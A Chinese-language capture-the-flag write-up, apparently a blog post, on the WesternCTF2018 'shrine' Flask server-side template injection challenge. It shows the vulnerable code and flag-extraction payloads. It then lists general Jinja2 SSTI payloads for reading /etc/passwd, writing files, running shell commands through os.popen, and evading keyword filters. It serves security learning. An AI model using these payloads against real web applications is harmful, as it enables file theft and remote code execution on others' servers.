本文详细剖析了Flask框架中两个路由的处理逻辑,展示了如何利用SSTI(服务器端模板注入)漏洞获取全局变量,如config和current_app中的flag。作者介绍了safe_jinja函数的黑名单机制,并展示了如何通过url_for、globals和魔术方法绕过过滤,执行命令或获取敏感信息。
打开题目
整理一下,代码:
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
我们简单的代码审计一下
定义了两个路由 / 和 /shrine/,分别对应两个视图函数 index 和 shrine
-
index视图函数:这个函数定义了一个路由/,当用户访问该路由时,会读取文件内容 -
shrine视图函数:这个函数定义了一个路由/shrine/,它接受一个参数shrine,内部函数safe_jinja对参数进行处理,并通过flask.render_template_string渲染模板。然而,safe_jinja函数中的黑名单机制替换了括号
-
blacklist = ['config', 'self']:定义了名为blacklist的列表,其中包含了要在模板中禁止使用的变量名'config'和'self'。 -
['{{% set {}=None%}}'.format(c) for c in blacklist]:这部分代码使用了列表推导式,遍历blacklist中的每个元素c,并生成一个格式化后的 Jinja2 模板语句'{{% set {}=None%}}',其中{}将会被替换为blacklist中的变量名。 -
''.join(...):使用join方法将列表中的所有模板语句连接成一个字符串。 -
+ s:将生成的模板语句字符串与传入的参数s连接起来,以生成一个经过处理的字符串返回给调用者
我们用tplmap测试有没有ssti注入
./tplmap.py -u ‘xxxxxx’
发现回显没发现注入点
我们发现有两个路由,我们测试一下
存在ssti注入
我们的目的就是获取全局文本,current_app的config里面的flag
在python里,有许多内置函数,其中有一个 url_for ,其作用是给指定的函数构造 URL。配合globals(),该函数会以字典类型返回当前位置的全部全局变量。
payload:
{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{url_for.__globals__['current_app'].config}}
都能得到flag
知识点:
1.ssti的漏洞实质
实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题
2.flask的一些特性
flask有两种渲染方式,render_template() 和 render_template_string()。
render_template()是渲染文件的,render_template_string是渲染字符串的
使用{ { }}作为变量包裹标识符;
快速查找该引用对应的位置:
''.__class__.__mro__[2].__subclasses__().index(file)
文件读写:
''.__class__.__mro__[2].__subclasses__()[40]
//读取文件
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']("/etc/passwd").read()
''.__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()
将read()改为write()就可以进行写操作:
''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123")
命令执行
1.利用eval进行命令执行
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')
2.利用commands实现命令执行
[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}
{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()
直接将这些payload放入{ {}}中作为变量执行即可获得想要的结果
flask之url_for函数
url_for()作用:
(1)给指定的函数构造 URL。
(2)访问静态文件(CSS / JavaScript 等)。 只要在你的包中或是模块的所在目录中创建一个名为 static 的文件夹,在应用中使用 /static 即可访问。
更多见:flask之url_for()函数_flask url_for-CSDN博客
02_详解Flask中的URL ——url_for() 与 自定义动态路由过滤器-CSDN博客
flask之current_app
是Flask中的一个全局变量,代表当前运行的Flask应用实例
current_app的主要作用是在应用程序的不同部分中访问应用实例,以便获取应用配置、数据库连接和其他应用范围的对象
Flask特有的变量和函数
config
config 对象就是Flask的config对象,也就是 app.config 对象
request
Flask中代表当前请求的request对象
session
Flask的session对象
url_for()
url_for会根据传入的路由器函数名,返回该路由对应的URL,在模板中始终使用url_for()就可以安全的修改路由绑定的URL,则不比担心模板中渲染出错的链接
get_flashed_messages()
这个函数会返回之前在flask中通过flask()传入的消息的列表,flash函数的作用很简单,可以把由Python字符串表示的消息加入一个消息队列中,再使用get_flashed_message()函数取出它们并消费掉
flask SSTI 题的基本思路
flask SSTI 题的基本思路就是利用 python 中的 魔术方法 找到自己要用的函数。
- __dict__:保存类实例或对象实例的属性变量键值对字典
- __class__:返回调用的参数类型
- __mro__:返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
- __bases__:返回类型列表
- __subclasses__:返回object的子类
- __init__:类的初始化方法
- __globals__:函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价
__base__ 和 __mro__ 都是用来寻找基类的。
姿势集:
1.{{config}} 可以获取当前设置
如果题目是这样的:
app.config ['FLAG'] = os.environ.pop('FLAG')
可以直接访问 {{config['FLAG']}} 或者 {{config.FLAG}} 得到 flag。
或者
{{self.__dict__._TemplateReference__context.config}}
同样可以找到 config。
2. [ ] 和 ( )
{{[].__class__.__base__.__subclasses__()[68].__init__.__globals__['os'].__dict__.environ['FLAG]}}
3.url_for、g、request、namespace、lipsum、range、session、dict、get_flashed_messages、cycler、joiner、config等
如果上面提到的 config、self 不能使用,要获取配置信息,就必须从它的全局变量(访问配置 current_app 等)。
例如:
{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}
4.一些关键字被过滤
- base64编码绕过
用于__getattribute__使用实例访问属性时。
例如,过滤掉 __class__ 关键词
{{[].__getattribute__('X19jbGFzc19f'.decode('base64')).__base__.__subclasses__()[40]("/etc/passwd").read()}}
- 字符串拼接绕过
{{[].__getattribute__('__c'+'lass__').__base__.__subclasses__()[40]("/etc/passwd").read()}}
{{[].__getattribute__(['__c','lass__']|join).__base__.__subclasses__()[40]}}
更多见:CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】 - 知乎
参考wp:
攻防世界 shrine——模板注入绕过:过滤(),{% set %} 过滤config、self - FreeBuf网络安全行业门户
[WesternCTF2018]shrine 1-CSDN博客
知识点参考文章:
Python Flask 基础入门第六课: Flask 全局变量 current_app, g 以及 session各自如何使用 有什么差异-CSDN博客
flask之url_for()函数_flask url_for-CSDN博客
250
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
